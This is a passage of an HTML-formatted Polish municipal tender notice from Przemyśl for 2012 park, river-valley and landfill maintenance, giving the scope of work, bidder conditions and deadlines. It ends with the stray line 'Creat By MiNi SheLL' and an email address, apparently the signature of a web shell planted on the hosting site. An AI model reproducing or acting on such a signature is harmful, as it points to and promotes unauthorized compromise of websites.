2. posadzenie kwiatów dostarczonych przez Zleceniodawcę w ilości 2.200 szt. - z możliwością zwiększenia ilości do 20%
c) pielęgnacja po posadzeniu, do czasu likwidacji (z wyłączeniem terenu cmentarzy):
- odchwaszczanie
- nawożenie i podlewanie
- usuwanie przekwitłych kwiatostanów (w razie potrzeby)
3. uzupełnianie na bieżąco wypadów oraz zniszczonych lub skradzionych roślin materiałem dostarczonym przez Zleceniodawcę,
4. wyściółkowanie korą nasadzeń letnich,
5. wapnowanie i przekopanie kwietników na zimę,
6. w razie wystąpienia chorób lub szkodników, stosowanie środków chemicznych.
7. likwidacja nasadzeń, uprzątnięcie terenu z wywozem urobku
2. Miejsca do ukwiecania:
a) kwietniki:
- Plac  Inwalidów Wojennych, Pomnik Piłsudskiego - (20m2)
- Park Miejski - (20m2)
- Cmentarz Główny (przy prosektorium) - (5m2)
b) gazony: 
Wzgórze Zamkowe, Cmentarz Zasański, Mauzoleum z I wojny światowej na cmentarzu wojskowym, Cmentarz Główny, obelisk przy ul. Monte Cassino.
VI. SADZENIE I PIELĘGNACJA POSADZONYCH DRZEWEK I KRZEWÓW NA TERENACH NALEŻĄCYCH DO GMINY MIEJSKIEJ PRZEMYŚL
1. Zakres prac:
1. pielęgnacja nowo posadzonych (w roku 2010 i 2011) drzew lub krzewów:
a) wiosenny przegląd nasadzeń, w razie stwierdzenia uschnięcia - likwidacja,
b) 4 krotne podlanie w sezonie
c) wiosenne przycięcie drzew i uformowanie koron.
2. Sadzenie drzewek
a) zakup drzewek lub krzewów, palików, osłon i stosownej ziemi urodzajnej (ok. 10 litrów na 1 nasadzenie),
b) wykoszenie terenu, celem umożliwienia wykopania dołów pod nasadzenia,
c) wykopanie dołów i częściowe ich zaprawienie ziemią urodzajną
d) posadzenie drzewek lub krzewów i ich podlanie
e) opalikowanie i przywiązanie drzewek.
f) założenie osłon chroniących przed uszkodzeniami w trakcie koszenia.
3. Koszty materiałów (ziemi, palików, osłon, ziemi urodzajnej) będą potwierdzone stosownym rachunkiem.
4. Zakup drzew będzie realizowany przy udziale Zamawiającego i potwierdzony stosownym rachunkiem.
5. W ofercie należy podać cenę za:
a) pielęgnację 200 szt. posadzonych drzew (zakres prac jak wyżej) 
b) dokonanie zakupu i posadzenie 1 szt. drzewka lub krzewu (zakres prac jak wyżej). W cenie nie należy uwzględniać ceny materiału nasadzeniowego, palika, osłony i ziemi urodzajnej).
6. Zakłada się możliwość nasadzenia do 150 szt. drzew lub krzewów, lecz dokładna ilość będzie wynikała z rzeczywistych potrzeb.
VII. UTRZYMANIE DOLINY SANU                                                                                                          
1. Teren działania obejmuje:
a) prawa strona: 
- od kempingu przed stadionem KS Polonia w kierunku Mostu R. Siwca do końca działki Obr. 208 Nr 421. (tj. ok. 120m. od ścieżki - będącej przedłużeniem ul. Rzeźniczej - prowadzącej na wał - zał. Nr 5)
- schody prowadzące do Doliny Sanu na odcinku od ul. Brudzewskiego do kempingu przed stadionem Polonia.
b) lewa strona: 
- od przystanku linii autobusowej nr 22 (włącznie z pętlą autobusową) w kierunku Mostu R. Siwca i 150 mb za mostem, łącznie z terenem przyległym do parkingu przy supermarkecie Biedronka oraz ścieżka o szerokości 2m, prowadząca do ogródków działkowych (do końca ogrodzenia ogródków) - z wyłączeniem placu zabaw znajdującego się w okolicach plaży miejskiej.
- wszystkie schody prowadzące do Doliny Sanu, na odcinku od Mostu Siwca do ul. Grunwaldzkiej
- koszenie ścieżek spacerowych, począwszy od ujęcia wody i gazociągu,
c) szerokość terenu: od lustra wody, po górną krawędź przyległych skarp, a na odcinku od mostu kolejowego do końca działki Obr. 208 Nr. 421 (prawa strona), po górną krawędź od strony jezdni.
2. Zakres prac:
Zbieranie zanieczyszczeń tj. papierów, butelek, opakowań oraz odpadów naniesionych przez wodę oraz wywiezienie urobku. 
3. Częstotliwość sprzątania w/w terenów:
a. w kwietniu 2012r. - 1 raz w tygodniu (w poniedziałki). W zamian za 9 kwietnia (Poniedziałek Wielkanocny)  sprzątanie należy wykonać w inny, ustalony dzień, 
b. od maja do września 2012r. - 2 razy w tygodniu (w poniedziałki i piątki),
c. w październiku i listopadzie 2012r. - 1 raz  w tygodniu (poniedziałek).
d. łączna ilość sprzątań, od 02 kwietnia 2012 r. do 30 listopada 2012 r., będzie wynosiła 63 razy.
e. codziennie, przez cały sezon - schody i najbliższe otoczenie do ok. 10 m oraz tereny najczęściej zaśmiecane tj. prawa strona: pod mostem kolejowym, przy dużym kamieniu oraz teren na przeciw tarasu ok. 100m; lewa strona: przy ławkach obok boiska, przy supermarkecie Biedronka, pod mostem kolejowym, pod Mostem Orląt, przy tarasie i teren plaży miejskiej
f. w sezonie zimowym bieżące odśnieżanie schodów oraz posypywanie ich własnymi środkami uszorstniającymi.
4. W ofercie należy podać koszt 1 sprzątania na doliny Sanu.
5. Koszenie:
a) 2-krotne koszenie całego terenu, bez wygrabienia urobku - (jednorazowe koszenie całego terenu nie powinno trwać dłużej niż trzy tygodnie)
b) dodatkowo 2-krotne koszenie strzeżonej plaży na wysokości osiedla Kmiecie,
c) dodatkowo 4-krotne koszenie ścieżek o szerokości ok. 2m
d) dodatkowo 1-krotne koszenie końcem czerwca, terenu przyległego do rzeki San na odcinku sąsiadującym z obiektami Camping Zamek i Hotel Gromada (pow. ok. 0,4 ha),
e) przewidywany termin koszenia: przełom maja i czerwca oraz sierpnia i września.
VIII. WYKOSZENIE NIECZYNNEGO SKŁADOWISKA ODPADÓW KOMUNALNYCH PRZY UL. FABRYCZNEJ                                                                                 
1. Teren działania 
Wskazany w załączniku - ok. 7 ha.
2. Zakres prac
Jednokrotne wykoszenie bez wygrabywania trawy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6, 77.31.41.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 5 000 zł.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że posiada:
1) aktualne zezwolenie na zbieranie odpadów komunalnych na terenie miasta Przemyśla wydanego zgodnie z art. 7 ust. 1 pkt. 1 ustawy z dnia 13 września 1996 r. 
o utrzymaniu czystości i porządku w gminach (tekst jedn. Dz. U. z 2005, Nr 236, poz. 2008 z późn. zm.), 
2) aktualne zezwolenia w zakresie transportu odpadów komunalnych, wydanego zgodnie z art. 28 ust. 1 ustawy z dnia 27 kwietnia 2001 o odpadach (tekst jedn. Dz. U. z 2007 r., Nr 39, poz. 251 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże się wykonaniem, a w przypadku świadczeń okresowych lub ciągłych również wykonywaniem usług, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie - co najmniej jednej usługi w zakresie całorocznego utrzymania terenów zielonych wykonał minimum jedną usługę podobną do przedmiotu zamówienia, wraz z załączeniem dokumentu potwierdzającego jej należyte wykonanie. Za podobną usługę Zamawiający uznaje usługę odpowiadającą swoim rodzajem usłudze stanowiącej przedmiot zamówienia, tj. koszenie traw, cięcie żywopłotów, odśnieżanie alejek i parkingów, wywóz nieczystości itp. - o wartości usługi minimum 300 tys. zł. brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje następującym sprzętem: 
1) ciągnik kołowy,
2) listwa spalinowa do cięcia żywopłotów,
3) 5 szt. kosiarek spalinowych,
4) 10 szt. kosiarek żyłkowych i 1 szt. kosiarka bijakowa,
5) małogabarytowy pojazd do usuwania urobku z terenu Parku, o ciężarze do 2,5 Mg.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia i posiada na dzień składania ofert opłaconą polisę,  a w przypadku jej braku inny dokument potwierdzający ubezpieczenie, na kwotę ubezpieczenia min. 100 000,00  zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne dokumenty:
1) wypełniony i podpisany przez osoby upoważnione do reprezentowania Wykonawcy Formularz oferty według wzoru stanowiącego załącznik Nr 2 do SIWZ, 
2) pełnomocnictwo osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę o ile osoba reprezentująca wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do jej reprezentacji we właściwym rejestrze.
3) pełnomocnictwo o którym mowa w pkt.5 ppkt. 1,
4) formularz cenowy - Załącznik Nr 2,
5) dowód wniesienia wpłaty wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający na podstawie art. 144 ust. 1 ustawy Prawo zamówień publicznych, przewiduje możliwość zmiany zawartej umowy w następujących przypadkach:
1) zmiany kluczowego personelu Wykonawcy na personel o kwalifikacjach, doświadczeniu i wykształceniu nie niższym niż wskazany w ofercie Wykonawcy,  niezbędne jest uzyskanie zgody Zamawiającego na zaproponowane zmiany (osoby), 
2) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
3) zmiany związanej z rezygnacją przez Zamawiającego z realizacji części przedmiotu umowy wskazanej w wielokrotności wykonywania opisanych czynności i związanej z tym odpowiednio zmiany wynagrodzenia,
4) zaistnienia okoliczności leżących po stronie Zamawiającego, w szczególności spowodowanych sytuacją finansową, zdolnościami płatniczymi albo okolicznościami, które  nie były możliwe do przewidzenia w chwili zawarcia umowy -  zmianie może ulec termin realizacji umowy lub zakres przedmiotu umowy,
5) gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność (np. warunki agrotechniczne, pogodowe itp.), za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, w szczególności bieżącego utrzymania porządku i czystości - zmianie może ulec określony termin świadczenia usług.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przemysl.pl BIP usługi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Przemyślu, ul. Ratuszowa 10A, 37-700 Przemyśl, Wieloosobowe Stanowisko ds. Zamówień Publicznych (II piętro pok. 205).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.12.2011 godzina 09:00, miejsce: Urząd Miejski w Przemyślu, ul. Ratuszowa 10A, 37-700 Przemyśl, Wieloosobowe Stanowisko ds. Zamówień Publicznych (II piętro pok. 205).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com